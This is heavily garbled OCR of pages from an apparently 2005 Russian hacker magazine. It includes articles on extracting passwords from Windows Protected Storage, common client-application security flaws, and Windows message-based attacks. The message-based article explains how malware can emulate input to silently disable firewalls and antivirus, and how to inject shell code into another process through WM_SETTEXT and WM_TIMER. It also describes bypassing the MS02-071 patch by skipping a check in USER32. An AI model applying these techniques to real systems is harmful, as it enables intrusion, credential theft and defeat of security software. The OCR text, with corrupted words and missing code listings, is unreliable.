всего при помощи tlibimp.exe из комп- 
лекта Delphi (командная строка: "tli- 
bimp.exe pstorec.dll"), полученные 
файлы (PSTORECLib_TLB.dcr, 
PSTORECLib_TLB.pas) подключаются 
в Delphi, как новый компонент. В pea- 
лизации же самого алгоритма на 
Delphi сильно помог опыт крэкера: 
дизассемблирование упомянутой вы- 
ше программы (Protected Storage 
PassView) принесло необходимые pe- 
зультаты, и в итоге был получен рабо- 
чий алгоритм (см. врезку). 

Чтобы код заработал, нужно кинуть 
на форму проекта все три установ- 
ленные PSTORECLib-komnoHeuTa, а 
переменные определить следующим 
образом: 


Строку GetDriveType('c:\"); удобно ис- 
пользовать для отладки своей прог- 
раммы в отладчике SoftICE. Тогда, 
чтобы прерваться на этом месте, нуж- 
но всего лишь ввести прерывание bpx 
GetDriveTypeA. 

В результате получается новая гото- 
вая программа - CRACKL@B Protected 
Storage Viewer 1.0. Можешь скачать 
ее в архиве вместе с исходниками по 
ссылке 


ЧТО-ТО ЕЩЕ 
В Windows 2k и выше также суще- 

ствует специальная служба. Смотри 
"Пуск"-> "Панель управления"-> "Ад- 
министрирование"-> "Службы"-> "За- 
щищенное хранилище". Там живет 
служба, которая обеспечивает его ра- 
ботоспособность. 

Если отключить эту службу, ни одна 
из программ не сможет считать дан- 
ные из защищенного хранилища. 


В ИТОГЕ 
Вот такие выводы можно сделать 

из всего этого: 

©. Все, что названо "защищенным", 
может оказаться совершенно безза- 
щитным ;). 

©. На всякий случай, не стоит дове- 
рять IE хранить пароли на доступ к 
закрытым зонам сайтов, лучше вво- 
дить пароль вручную. Да, каждый раз. 

9. Даже крупнейшие провайдеры 
могут идти на компромиссы в инфор- 
мационной безопасности. 

@. "Вирусом" могут обозвать не 
только вирус, но и любую неорди- 
нарную программу, которая им не яв- 


ляется. 


ня о 
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Нужны паро- 
ли? Качай 
Protected 
Storage 
PassView или 
Protected 
Storage 
Explorer. 


Наиболее расп- 
ространена 
охота на акка- 
унты почтового 
клиента, так 
как они же 
часто бывают 
поставлены и 
на доступ в ин- 
тернет. 


Пароли лучше 
хранить в го- 
лове или где- 
то не на 
компьютере. 
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@7И клиент 


ИНСТРУКТАЖ ПЕРЕД БОЕМ ) 


ts Content: 


18 Инструктаж перед боем 
Ошибки клиентских приложений 


24 Издевательство над 
окнами 
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Через служебную инорормацию и и целая армия ботнетов, сопоставимая по 
и ПРОТОН ЕИКОм своей мощи с лучшими суперкомпьютерами, 
и которыми только располагает Пентагон. И са- 
ие Как работает мое главное: клиентские компьютеры ничем 
ИИ, БОЖЕ не защищены. Чем вооружен типичный поль- 
зователь? Правильно, мышью :). 


СВОБОДА БЕЗ ГРАНИЦ, ИЛИ 
ПЕРЕПОЛНЕНИЕ 

Среди всех типов ошибок по-прежнему 
лидирует переполнение Gycpepa, характер- 
ное в основном для С/С++ приложений, но 
также встречающееся на DELPHI или Пас- 
каль. Причина - банальная невниматель- 
ность, неряшливость и небрежность при 
программировании. Современные приложе- 
ния используют сотни тысяч буферов, и 
при бешеных темпах разработки очень 
трудно уследить за всем этим хозяйством. 
Нет, я не собираюсь призывать девелопе- 
ров к порядку. Человеку свойственного 
ошибаться. Это факт. Многие руководства 
по безопасности рекомендуют: "Прежде 
чем класть что-то в буфер, проверьте, вле- 
зет ли". Например, объединение двух строк 
может выглядеть так: 


Это неправильно! И вот почему: контроль 
длины - ОЧЕНЬ прожорливая операция, от- 
нимающая уйму процессорного времени, но 
не дающая никаких гарантий, так как за кор- 
ректностью кода следит не машина, а прог- 
раммист! К тому же не совсем понятно, как 
обрабатывать ситуацию с нехваткой памяти. 
Аварийно прекращать работу приложения - 
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так это настоящий DoS получается! А чтобы 
корректно сохранить все несохраненные 
данные, придется вводить поддержку тран- 
закций, чтобы значительно усложнит архи- 
тектуру программы. 

Некоторые рекомендуют использовать 
функции типа snprinf, позволяющие ограни- 
чить длину возвращаемых данных, что яко- 
бы защищает от переполнения. На первый 
взгляд, все замечательно: 


Исходный код значительно упрощается, а 
производительность и защищенность значи- 
тельно возрастают. На самом деле, выбрав- 
шись из одной дыры, мы тут же вляпываемся 
в другую. Автоматическое усечение данных 
по длине буфера вносит огромную неразбери- 
ху, порождая трудноуловимые ошибки. Любой 
догадается, что произойдет при "кастрации" 
номера кредитной карты или, скажем, имени 
cpaiina. Так что без дополнительного уровня 
контроля все равно не обойтись. К тому же тут 
очень легко ошибиться, передав срункции не- 


_Стоит только потрясти 


верный размер. Вот пример типичной 
ошибки, порождающей переполнение: 


snprintf(buf,BUF_SIZE, "%s %s", FirstName, 
LastName); 

snprintf(&buf[strlen(buf)], BUF_SIZE, " %s", 
Alias); 


Во-первых, He "buf, BUF_SIZE", а 
"buf, BUF_SIZE-1", поскольку функция 
snprintf ожидает не размер буфера, a 
максимальное количество возвраща- 
емых байт, за которыми должен сле- 
довать завершающий нуль, но... он не 
следует. Если strlen(FirsName)+strien(" 
")+strlen(LastName)) == BUF_SIZE, то 
snpritnf "забывает" о нем. Хорошень- 
кое начало, нечего сказать! Если 
программист не поставит его туда са- 
мостоятельно, программа рухнет 
окончательно! Не найдя завершаю- 
щего нуля, функция strlen выйдет да- 
леко за пределы строки и остановится 
неизвестно где. 

Во-вторых, "&buf[strlen(buf)], 
BUF_SIZE" должно быть заменено на 
"BUF_SIZE - strlen(buf) - 1". Програм- 
мист по инерции использовал 
BUF_SIZE, не заметив, что часть буфе- 
ра уже занята. И такие ошибки встре- 
чаются постоянно! 

Правильный вариант выглядит так: 


memset(buf, 0, BUF_SIZE): 
if (snprintf(buf, BUF_SIZE-1, 

"%s Ys", FirstName, 
LastName)==-1) log("warring"); 


if (snprintf(&buffstrlen(buf)], BUF_SIZE- 
strlen(buf)-1, 
" %5", Alias); log("warring"); 


Прямо не программа, a сплошное 
минное поле получается. Маленькая 
небрежность рушит все! Поэтому на 
чистом С слабонервным лучше не 
программировать :). 

Лучшее средство от переполнения 
- это динамические массивы, которые 
легко реализовать на С++. Необходи- 
мость "ручного" контроля за грани- 
цами стразу же отпадает. Под массив 
отводится именно столько памяти, 
сколько ему требуется, а если не 
удается выделить память, возбужда- 
ется исключение. Но это уже край- 
ний случай. Для надежности можно 
перекрыть оператор [], выполняя ав- 
томатическую проверку границ при 
каждом обращении к массиву (впро- 
чем, некоторые компиляторы умеют 
делать и самостоятельно - нужно 
только найти соответствующую оп- 
цию и активировать ее). Собственно 
говоря, динамические массивы явля- 
ются частным случаем списков. 
Списки - это потрясающий инстру- 
мент, очень простой в управлении и 
не подверженный никаким перепол- 
нениям! 

Естественно, списки и динамические 
массивы существенно замедляют ра- 
боту, однако на новых процессорах 
это не так уж и заметно. Узким местом 


сетевых приложений является пропу- 
скная способность интернет-каналов 
и операции ввода/вывода, так что 
накладными расходами можно смело 
пренебречь. Главное, что количество 
ошибок и трудоемкость разработки 
резко снижается. И то, и другое - это 
прямой доход, а производительность - 
понятие растяжимое. Переплачивать 
за нее готовы единицы, да и то после 
предварительной пропаганды и про- 
мывки мозгов :). 

Пример использования динамических 
буферов (правильный вариант, не под- 
верженный ошибкам переполнения): 


dynchar buf = FirstName + " " + [а${Мате + 
ии + Alias; 


Он предельно прост. Только никогда 
не используй CString. Это жуткий 
класс. Пиши свои собственные дина- 
мические буфера, отличные примеры 
которых можно найти в "Искусстве 
программирования" Кнута. 


КРИПТОГРАФИЯ НАОБОРОТ 

м Криптография сейчас в моде и на- 
силуется даже там, где еще вчера бы- 
ла совершенно не нужна. Известное 
правило гласит: "Защищенность сис- 
темы определяется ее самой слабой 
частью". Просто прикрутить к прог- 
рамме какой-нибудь криптографичес- 
кий протокол (например MD5) еще 
недостаточно. Это все равно что на- 
весить на дачный домик железную 
дверь. Тут нужен целый комплекс за- 
щитных мер. Решетки на окнах. Бе- 
тонные стены, полы и потолок. Сигна- 
лизация. Камера видеонаблюдения, 
наконец! 

Реализовать криптографический 
протокол не так-то просто. Даже та- 
ким монстрам, как Microsoft, не всегда 
удавалось сделать это с первого ра- 
за :). Вот неполный перечень наибо- 
лее популярных ошибок: выбор не- 
стойких криптоалгоритмов, малая 
длина ключа, отсутствие проверок на 
слабые (weak) ключи, хранение клю- 


ча вместе с данными, повторное на- 
ложение гаммы шифра, самосинхро- 
низация, зависимость времени обра- 
ботки ключа от времени, отсутствие 
случайной привязки (salt), отладоч- 
ные люки или возможность принуди- 
тельно от- 

ключить шифрование. 

Например, хэш Lan Manager'a, ис- 
пользуемый оля аутентификации в 
IBM 05/2 и Microsoft Windows МТ, ге- 
нерируется на основе двух "полови- 
нок" 14-символьной строки, в резуль- 
тате чего его криптостойкость ослаб- 
ляется в сотни миллиардов раз! В гру- 
бом приближении, для взлома 14-сим- 
вольного пароля требуется перебрать 
порядка N14 вариантов, а для взлома 
двух половинок - 2*М7, где М - коли- 
чество символов в "алфавите" паро- 
ля (gna Windows МТ - 68). 

При шифровании идентичных дан- 
ных одним и тем же ключом мы полу- 
чим один и тот же шифротекст. Вроде 
бы все логично, но это настоящая ды- 
ра. Хотя злоумышленник не может 
расшифровать текст, он может хотя 
бы приблизительно установить его 
содержимое. Например, в той же 
Windows МТ можно быстро найти 
пользователей, чьи пароли совпада- 
ют - их хэши будут идентичны! Вроде 
бы мелочь, но неприятно. 

С потоковыми шифрами все гораз- 
go сложнее. Одна и та же часть гам- 
мы ключа многократно накладывает- 
ся на различные шифроданные, сре- 
ди которых может присутствовать не- 
которое количество предсказуемой 
информации (например тип протоко- 
ла в заголовке сетевого пакета). Это 
позволяет восстанавливать по нес- 
колько байт гаммы за раз, но, пос- 
кольку в различных пакетах на одни 
и те же поля накладываются различ- 
ные части гаммы, через некоторое 
время вся гамма восстанавливается 
целиком и хакер получает возмож- 
ность полностью расшифровать лю- 
бой пакет. 


При шиофровании идентичных данных 
одним и тем же ключом мы получим 
один и тот же шифротекст. 
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Сеанс аутентификации 


и .=-. м 


i 


Приложений 
без дырок не 
существует! 


Изначально 
никто и не ду- 
мал защищать 
клиентские 
приложения, 
пока не при- 
шел интернет. 
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Переполнение 
буфера - одна 
из часто встре- 
чающихся ды- 
рок, через ко- 
торую имеют 
многие прило- 
жения. 


Многое проще 
и лучше реа- 
лизовать на 
С++: програм- 
мисты на С 
обычно допус- 
кают больше 
ошибок. 
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Чтобы этого не случилось, каждый 
ключ должен использоваться только 
один раз. Но заставить пользователя 
менять ключи с такой скоростью 
просто негуманно, поэтому эфоректив- 
ный ключ шифрования обычно гене- 
рируется на основе секретного ключа, 
введенного пользователем, и случай- 
ной привязки, автоматически генери- 
руемой компьютером. Атаковать та- 
кую защиту по открытому тексту уже 
невозможно, но, тем не менее, она 
уязвима. 

Некоторые криптоалгоритмы (RC4, 
DES и gp.) при шифровании с опреде- 
ленными ключами взламываются 
намного быстрее, чем ожидалось, так 
как малая часть битов ключа воздей- 
ствует на значительное количество 
бит шифротекста. Такие ключи назы- 
ваются "слабыми" (weak). Программа, 
которая заботится о своей безопас- 
ности, обязательно должна прове- 
рять ключи на слабость, но, как пока- 
зывает практика, многие из них об 
этом забывают. К их числу принадле- 
жит и протокол WEP, использующий- 
ся в устройствах беспроводной свя- 
зи. Поскольку эффективный ключ 
шифрования генерируется на основе 
секретного ключа и случайной при- 
вязки, "концентрация" слабых клю- 
чей становится просто угрожающей, 
и даже 128-битные ключи взламыва- 
ются без особой натуги. 

Замечу, что следует защищаться не 
только от перехвата трафика, но и от 
навязывания подложных пакетов. 
Уже упомянутый WEP с этим не справ- 
лялся, и однажды перехваченный па- 
кет может быть ретранслирован злоу- 
мышленником вновь и вновь, позво- 
ляя тем самым реализовать атаку "от- 
каза в обслуживании". 

Кстати об отказах. С ростом пропуск- 
ной способности интернет-каналов 
требования к скорости шифрования 
резко ужесточились. Несколько лет 
назад, когда коннект на 33.600 был 
пределом мечтаний, а модем на 56К 
сулил жизнь в раю, время шифрова- 
ния не играло никакой роли, но уже 
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ЧТЕНИЕ СЕКТОРА С ЖЕСТКОГО ДИСКА (ПРОДОЛЖЕНИЕ) 


на двухмегабитном канале со многими 
алгоритмами в реальном времени 
РепНит-4 не справляется, а одногига- 
битный Ethernet при использовании 
МО5 будет тормозить, как слон. Крип- 
тостойкость - далеко не единственный 
критерий, и выбирать "правильный" 
алгоритм шифрования следует с 
большой осторожностью. 

Секретный ключ ни в коем случае не 
должен храниться на клиентском 
компьютере открытым текстом, иначе 
его похитит любой троян. Некоторые 
программисты пишут специальный 
драйвер, защищающий срайл с паро- 
лями от постороннего доступа, однако 
эту преграду легко обойти. Например, 
"впрыснуть" хакерский код Henocpeg- 
ственно в саму клиентскую программу 
и прочитать пароль ее руками. Мож- 
но, конечно, использовать проверку 
целостности, но это вряд ли усилит 
надежность. Лучше использовать не- 
симметричную криптографию и сеан- 
совые ключи, автоматически меняю- 
щиеся каждые 10-15 минут, а в ответ- 
ственных случаях запихать шифра- 
тор в USB-key. 

Короче говоря, без предваритель- 
ной подготовки к разработке криптог- 
радических протоколов лучше не 
подходить. Это должен делать специ- 
алист и не в одиночку. 


ПОДЕЛИСЬ ПРИВИЛЕГИЯМИ 
С ДРУГОМ 

Большинство пользователей пос- 
тоянно работают под администрато- 
ром ("администратор - это круто"), что 
открывает полный доступ всем виру- 
сам, хакерам и червям. Microsoft Hac- 
тоятельно рекомендует ограничить 
свои привилегии до минимума и вхо- 
дить под администратором только тог- 
да, когда в системе необходимо что-то 
настроить или подкрутить. 

На самом деле независимо от теку- 
щего уровня привилегий в системе 
всегда присутствует множество про- 
цессоров типа SYSTEM, а это точно 
круче, чем администратор. Часть из 
них принадлежит системным компо- 
нентам, часть - антивирусным служ- 
бам и прочим приблудам. Зачем это 
надо? Для своей работы антивирус 
требует наивысших привилегий, но 
заставлять пользователя при каждом 
запуске переключаться на админист- 
ратора негуманно и идеологически 
неправильно. Поэтому весь привиле- 
гированный код помещается в службу, 
работающую со специальными права- 
ми доступа, а в особо критических слу- 
чаях приходится прибегать к помощи 
драйвера, работающего на нулевом 
кольце, могущество которого ничем не 
ограничено. Лишь немногие драйверы 
управляют реальными или виртуаль- 
ными устройствами. Гораздо чаще они 
используются как своеобразный 
шлюз к операциям, которые на прик- 
ладном уровне просто невыполнимы 
(прочитать сектор с диска, обратиться 
к портам ввода/вывода и T.G.). 


Очень часто 
разрабатывают 
отличную па- 
радную защиту, 
но совершенно 
забывают про 
другие возмож- 
ные лазы. 


Лезть в крип- 
тографию без 
достаточного 


опыта - со 
100% гаранти- 
ей допускать 
критические 
ошибки в безо- 
пасности. 
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Хотя действи- 
тельно чаще 
всего виноваты 
сами пользо- 
ватели, кото- 
рые сидят под 
админами. Не 
всегда приви- 
легии получа- 
ются только 
лобовым спо- 
собом. 


Любой драй- 
вер, работаю- 
щий на нуле- 
вом кольце, - 
отличная воз- 
можность по- 
лучить необхо- 
димые приви- 
легии. 


Если хочешь 
сообщить ко- 
му-то о най- 
денной ошибке 
в его системе 
безопасности, 
не спеши: лю- 
ди реагируют 
адекватно не 
всегда :). 


7 КЕНТ | ИНСТРУКТАЖ ПЕРЕДБОЕМ ) 


Проектирование драйверов и при- 
вилегированных служб требует 
большого внимания и тщательной 
подготовки. Любой такой драйвер - 
это потенциальная дыра в системе 
безопасности. Перед выполнением 
каждого "серьезного" действия тре- 
буется провести целый ряд прове- 
рок на предмет выяснения, имеет ли 
пользователь право делать это. В 
частности, программы для прожига 
лазерных дисков устанавливают 
драйверы, позволяющие отправить 
SCSI/ATAPI-KoMaHgbI с прикладного 
уровня. Проверка типа устройства 
обычно отсутствует или реализова- 
на некорректно, что позволяет уп- 
равлять жестким диском даже с гос- 
тевыми привилегиями! Этим, в част- 
ности, славится популярный ASPI32- 
драйвер от компании Adaptec (впро- 
чем, в последних версиях эта ошиб- 
ка была исправлена). 

Во врезке приведена программа, 
позволяющая читать секторы с жест- 
кого диска через ASPI32. 

Другой пример. Не менее популяр- 
ный антивирус Dr.WEB при запуске 
из панели управления отображал 
графический интерфейс, передавая 
ему все свои привилегии (то есть 
SYSTEM), который охотно раздавал 
их всем желающим. В меню About 
присутствовала традиционная ссыл- 
ка на страничку разработчиков (ку- 
да же без нее), при нажатии на кото- 
рую вызывался браузер по умолча- 
НИЮ... А BOT это уже люк! Заменив IE 
на свою программу, хакер имел SYS- 
ТЕМ и мог вытворять все что угодно. 
Даже самый последний ламер, наб- 
рав в адресной строке путь к ло- 
кальному файлу (например 
"File://C:\WINNT\System32\cmd.exe), 
получал в свое распоряжение ору- 
дие убийственной силы. 

При разработке ответственных 
приложений доверять никому нель- 
зя! Ни своему собственному коду, 
ни даже операционной системе. 
Следует предусмотреть все возмож- 
ные варианты развития событий, но 
и не скатываться GO тривиального 
подсчета контрольных сумм, кото- 
рый очень легко отломать. Защита 
должна защищать, а не создать ви- 
димость защищенности. Говорят, в 
Египте прямо посреди пустыни уста- 
новлены ворота, регламентирую- 
щие ввод/вывод. Тьфу! Вход/вы- 
ход. Ну, порядок у них такой. Но без 
ворот в пустыню сможет попасть 
кто угодно и когда угодно. Так вот, 
многие программы построены по той 
же самой схеме. Да, в них действи- 
тельно есть мощная система шиф- 
рования и 128-битный ключ (а иног- 
даи1024-битный), но она установ- 
лена посреди пустыни! 
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Командный интерпретатор, запущенный из IE 


Рабочее место настоящего хакера | 


На наших дисках ты всегда 
найдешь тонну самого свежего 
софта, демки, музыку, а также 

2 видео по взлому! 


ЧИТАЙ В АВГУСТЕ: 


Угнанные сорцы 
Как украли исходные коды 
одной компьютерной игры. 


Крекинг - это просто 
Первые шаги для 
начинающего крекера. 


Reason. Сотворение звука 
Как музыканты пишут свою 
электронную музыку. 


Технологии бессмертия 
Крионика и другие 
стимуляторы жизни. 
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ЧЕ КТиЕНТ | ИЗДЕВАТЕЛЬСТВО НАДОКНАМИ ) 


ИЗДЕВАТЕЛЬСТВО 
НАД ОКНАМИ 


ЭМУЛЯЦИЯ ВВОДА С КЛАВИАТУРЫ 


конный интерфейс операционной системы Windows построен на системе сообщений, пронизывающий все элементы 
(©) управления. Любое приложение, независимо от уровня своих привилегий, может рассылать сообщения, адресуемые 
более привилегированным приложениям, и они воспринимаются как правильные. Механизмы аутентификации 
отсутствуют. Начисто! 


то позволяет легко 


эмулировать движение ФРАГМЕНТ АВТОМАТИЧЕСКОГО РЕГИСТРАТОРА, 


MBIA ВВО9 С КЛавиа: ДЕМОНСТРИРУЮЩИЙ ТЕХНИКУ ЭМУЛЯЦИИ ВВОДА 


туры, управляя атакуе- 


мым приложением, как 
рулем. Эмуляция ввода позволяет пе- 
рехватывать клавиатурный ввод, счи- 
тывать состояние элементов управ- 
ления (например строки редактиро- 
вания) и даже передавать управле- 
ние на свой собственный Shell-Kog. 
Как можно использовать это? Нап- 
ример, в системе имеется файрвол, 
блокирующий доступ наружу. Но не 
сидеть же все время взаперти. Ско- 
рее всего, в настойках файрвола бу- 
дет опция, отключающая защиту. То 
же самое справедливо и для антиви- 
русных сторожей. 

Что делает вирус? Он запускает 
файрвол/антивирус, находит главное 
окно приложения, посылает ему сооб- 
щение "стань невидимым", затем эму- 
лирует последовательность нажатий, 
вызывающих Центр Управления, и 
что-то там "нажимает". Естественно, 
когда вся работа будет сделана, за- 
щиту необходимо включить вновь, 
иначе нас очень быстро разоблачат. 

Конечно, эта методика далеко не 
универсальна. Вирус должен поддер- 
живать все типы популярных антиви- 
русов и файрволов, иначе ему ни за 
что не выжить в агрессивной среде 
недружелюбно настроенного киберпро- 
странства. Но универсальных методик 
захвата управления вообще-то не су- 
ществует. И в отличие от "дыр", кото- 
рые закрываются очередной заплат- 
кой, эмуляция ввода может рассчиты- 
вать на долгосрочную перспективу, к 
тому же популярных защитных прог- 
рамм не так уж много. Где-то с деся- 
ток, ну, от силы полтора десятка. Так 
что эта методика имеет полное право 
на существование. 


НАХОДИМ ЧУЖОЕ ОКНО 
И ПРОБУЕМ ИЗДЕВАТЬСЯ 
НАД НИМ 

Для эмуляции ввода тебе потре- 
буется дескриптор окна, которое бу- 
дет принимать сообщения. Дескрип- 


тор можно получить несколькими ПИИИТ 
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способами. Самое простое - восполь- 
зоваться АР|-вызовом FindWindow, 
возвращающим дескриптор окна по 
его названию (текстовой строке, кра- 
сующейся в заголовке). Более слож- 
ный, но и более гибкий вариант сво- 
дится к последовательному перебору 
(перечислению) всех имеющихся 
окон. Перечислением окон верхнего 
уровня занимается АР!-функция 
EnumWindows, а дочерние окна (эле- 


менты управления в том числе) берет 
на себя EnumChildWindows. 

Получить дескриптор главного окна 
атакуемого приложения - не пробле- 
ма, так как мы знаем его имя, которое 
в большинстве случаев однозначно 
идентифицирует данное окно. С go- 
черними окнами справиться не в при- 
мер сложнее. Кнопки еще можно рас- 
познать по надписям (получаем деск- 
рипторы всех дочерних окон вызовом 


Порядок перечисления 
окон всегоа один и тот же 


ФРАГМЕНТ АВТОМАТИЧЕСКОГО РЕГИСТРАТОРА, 


ДЕМОНСТРИРУЮЩИЙ ТЕХНИКУ ЭМУЛЯЦИИ ВВОДА 


EnumChildWindows, а затем посылаем 
каждому из них сообщение WM_GET- 
ТЕХТ с требованием сказать, кого как 
зовут, после чего останется лишь со- 
поставить дескрипторы кнопок с их 
названиями), но с окнами редактиро- 
вания такой ‹рокус уже не проходит: 
по умолчанию они вообще не содер- 
жат в себе никакой информации. В 
принципе, можно получить идентифи- 
катор элемента управления, кстати го- 
воря, не зависящий от языковой 
раскладки и одинаково хорошо рабо- 
тающий как на англоязычных, так и 
на русифицированных приложениях, 
но зачем усложнять себе жизнь? 
Порядок перечисления окон всегда 
один и тот же, значит, определив наз- 
начение каждого из дочерних окон 
экспериментально (или с помощью 
шпионских средств типа 5рухх из комп- 
лекта SDk), ты можешь жестко пропи- 
сать их номера в своей программе. 


ЖМЕМ НА ЧУЖИЕ КНОПКИ 

Как видно, ввод/вывод текста в 
окно редактирования не вызывает 
больших проблем: 
WM_SETTEXT/WM_GETTEXT и все 
пучком. Нажать на кнопку "програм- 
мно" несколько сложнее. Посылка со- 
общения BM_SETSTATE элементу уп- 
равления типа "кнопка" еще не при- 
водит к ее нажатию. Для корректной 
эмуляции ввода ты, во-первых, дол- 
жен установить срокус (WM_SETFO- 
CUS), а после перевода кнопки в сос- 
тояние "нажато" убить этот фокус 
(WM_KILLFOCUS), так как кнопки сра- 
батывают не в момент их нажатия, а в 
момент отпускания. 

Кстати, если в роли убийцы фокуса 
выступает функция SendMessage, то 
поток, эмулирующий ввод, блокиру- 
ется вплоть gO того момента, пока 
обработчик нажатия кнопки не возв- 
ратит циклу выборки сообщений сво- 
его управления. Чтобы этого не про- 
изошло, следует использовать 
функцию PostMessage, которая по- 
сылает сообщение и, не дожидаясь 
ответа, как ни в чем не бывало про- 
должает выполнение. 


» 


При пересылке 
сообщения от 
одного прило- 
жения другому 
механизмы ау- 
тентификации 
не задейству- 
ются! 


Получить деск- 
риптор интере- 
сующего тебя 
приложения - 
самое простое, 
геморрой начи- 
нается с go- 
черними окна- 
мии их эле- 
ментами уп- 
равления. 


Для эмуляции 
ввода сначала 
нужно устано- 
вить фокус 
(WM_SETFO- 
CUS), а потом 
убить этот фо- 
кус (WM_KILL- 
FOCUS), так 
как кнопка 
срабатывает в 
момент отпус- 
кания. 
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"Автоматическое" считывание имени пользователя, ввод регистрационного номера и эмуляция нажа- 
тия "ввод" 


Все это, конечно, хорошо, но внед- 
рить код в чужой процесс намного ин- 
тереснее! Традиционные способы с 
подключением собственной DLL, 
WriteProcessMemory или 
CreateRemoteThread тут не годятся, 
поскольку разработчики антивирусов 
и файрволов хорошо осведомлены о 
них и принимают целый комплекс за- 
щитных мер, справиться с которыми 
не так-то легко. Но мы все равно пере- 
хитрим их :). 

Сообщение \\/М_ТИМЕР позволяет 
передавать не только идентификатор 
таймера, но и адрес таймерной проце- 
дуры, вызываемой операционной сис- 
темой независимо от того, был ли 
предварительно взведен таймер. Сле- 
дующий бесхитростный код перехва- 
тывает управление у "Калькулятора" 
и передает его по адресу 401234h: 


Адрес 0x401234 выбран чисто для 
примера. Ничего интересного здесь 
нет. Калькулятор просто упадет. Для 
достижения осмысленного результата 
атакуемому приложению необходимо 
как-то передать зловредный shell-Kog. 
А как это можно сделать? Самое прос- 
тое - найти любое окно редактирова- 
ния и послать ему WM_SETTEXT, толь- 


| а | 
ыы гы гы и | 


Дефейсеный калькулятор 


Дефейсеный командный интерпретатор 


ХАКЕРСПЕЦ | 09(58)| 2005 


Bendkisssage (hited, We GETTEET. Haxken. un but): 


гы sl 
— | | 
ewe ae int 1 


ко вместо текста здесь будет $Не!-код. 
Если нет строки редактирования - не 
беда. На худой конец сгодится и заго- 
ловок главного или дочернего окна, 
правда, на сам $Пе!-код в этом случае 
будут наложены жесткие ограниче- 
ния. Остается лишь определить адрес 
буфера, в котором хранится содержи- 
мое окна. А хранится оно во вполне 
предсказуемых буферах: их местопо- 
ложение легко nog- 

смотреть под отладчиком. 


Самое простое - найти любое 
окно редактирования и послать 
ему WM_SETTEXT 


ДЕФЕЙСИМ КАЛЬКУЛЯТОР И ДРУГИЕ ПРОГРАММЫ 


fendtiesaage (hie. HH_EETPOCOE. 1. oir 
Шагин (hie, EM_S0TETATE, 1. 0]: 
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Коварное сообщение WM_TIMER 


Этот прием работает во всех опера- 
ционных системах семейства Windows, 
включая непатченую ХР. В начале 
2003 года баг с таймером был исправ- 
лен, о чем можно прочитать в 
Microsoft Security Bulletin'e за номером 
MS02-071. На самом деле радикальной 
смены парадигмы так и не произошло. 
Разработчики так и не рискнули тро- 
гать систему сообщений, ограничив- 
шись парой дополнительных прове- 
рок в USER32.DLL. Теперь посылать 
сообщение WM_TIMER можно только 
своему собственному окну. Но 
USER32.DLL - это же всего лишь 
"обертка" поверх win32k.sys, и ее мож- 
но обойти! Достаточно немного пот- 
рассировать SendMessageA и в нуж- 
ном месте перепрыгнуть через "ле- 
вый" хх, который можно найти по 
шаблону "стр xxx,113h/jxx". К примеру: 


text:77E1554D стр вах, 113h ;\ММ ПМЕВ 
text:77E15551 7 106775692 
text:77E15557 оу — сх, eax 
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Все, что нужно сделать, - дождаться 
выполнения команды стр еах, ЗВ и 
передать управление по адресу 
77E15557h. Теперь сообщение 
WM_TIMER будет доставляться неза- 
висимо от территориальной принад- 
лежности атакуемого окна. А трасси- 
ровать свою собственную проекцию 
USER32.DLL нам никто не запрещает. 
Во всяком случае пока... 

Разумеется, от эмуляции клавиа- 
турного ввода антивирус может за- 
щититься: например, перед каждым 
изменением конфигурации задавать 
случайный вопрос из серии "Сколь- 
ко будет дважды два?". Человек 
легко ответит, а вирус - едва ли. 
Простой парольной защиты здесь 
явно недостаточно, поскольку пе- 
рехват пароля не является большой 
проблемой. Ho вот от WM_TIMER на 
прикладном уровне никакой защиты 
нет! И не будет до тех пор, пока 
Microsoft не выпустит очередную 
заплатку, на этот раз действительно 
исправляющую дыру, а не делаю- 
щую морду тапком. 


ЖУРНАЛ 
О КОМПЬЮТЕРНОМ 
ЖЕЛЕЗЕ 


от создателей 
= >. 
anne 


Тесты: 
¢ Мониторы LCD 19" 
® Материнские платы LGA 775 
Акустика 2.0 
¢ А0$1-модемы 
® Жесткие диски IDE 


Инд?о: 
¢ Технология АТ! Crossfire 
Линейка материнских плат Asus 


Практика: 
¢ Моддинг: 30-9гИ! 
* Линукс: управление питанием 


ЖУРНАЛ КОМПЛЕКТУЕТСЯ 
ДИСКОМ С ЛУЧШИМ СОФТОМ 


Дизассемблирование функции SendMessageA при помощи IDA Pro 


Теперь 160 страниц! 


ULTIMATE ADVENTURE р 


Крис Касперски аКа мыщьх 


ULTIMATE А 
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СТРАТЕГИЯ ПОИСКА ДЫР В ДВОИЧНОМ КОДЕ 


сходные тексты Linux'a и других open 5оигсе-систем в прямом смысле зачитаны до дыр, и найти здесь что-то 
принципиально новое очень трудно. Windows - другое geno. 
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епроходимые джунгли 


двоичного кода отпуги- 


вают новичков, и ог- 


ромные территории диз- 


ассемблерных листин- 
гов все еще остаются неизведанными. 
Причудливые переплетения вложен- 
ных вызовов скрывают море грубых 
ошибок программистов и дают неогра- 
ниченную власть над системой. Поп- 
робуй найти их, а я покажу, как. 

Считается, что открытость исходного 
кода - залог надежности любой систе- 
мы, поскольку спрятать закладку 
(черный ход, троянскую компоненту) в 
таких условиях практически невоз- 
можно. Тысячи экспертов и энтузиас- 
тов со всего мира тщательно проана- 
лизируют программу и выловят всех 
блох - как случайных, так и выпущен- 
ных намеренно. Что же касается от- 
компилированного двоичного кода, 
трудоемкость его анализа неоправ- 
данно велика, и никто не будет во- 
зиться с ним "за просто так". Что ж, 
достойный аргумент сторонников дви- 
жения Open Source, известных своим 
радикализмом и отрицанием объек- 
тивной реальности. 

А реальность такова, что проанали- 
зировать исходный код современных 
приложений за разумное время ни 
физически, ни экономически невоз- 
можно. Даже старушка MS-DOS 6.0 в 
исходных текстах весит свыше 60 Мб. 
Для сравнения, "Generation П" Викто- 
ра Пелевина не дотягивает и до мега- 
байта. Даже если уподобить исход- 
ные тексты развлекательной книге, 
подсчитай, сколько времени понадо- 
бится для их прочтения? А исходные 
тексты - совсем не художественное 
произведение. Это нагромождение 
сложно взаимодействующих друг с 
другом структур данных, тесно переп- 
летенных с машинным кодом... 

При средней длине одной х86-ко- 
манды в два байта каждый килобайт 
откомпилированного кода несет на 
своих плечах порядка пятисот (!) диз- 
ассемблерных строк, соответствую- 
щих десяти страницам печатного текс- 
та. Прочитать мегабайтный двоичный 
роман за разумное время уже невоз- 
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можно. Современные программные 
комплексы не могут быть исследова- 
ны 90 последней запятой, и наличие 
исходных текстов ничего не меняет. 
Какая разница, сколько времени 
продлится работа - тысячу лет или 
миллион? Процедура поиска дыр пло- 
хо поддается распараллеливанию 
между участниками, так как отдель- 
ные участки программы выполняются 
отнюдь не изолированно друг от дру- 
га, а сложным образом взаимодей- 
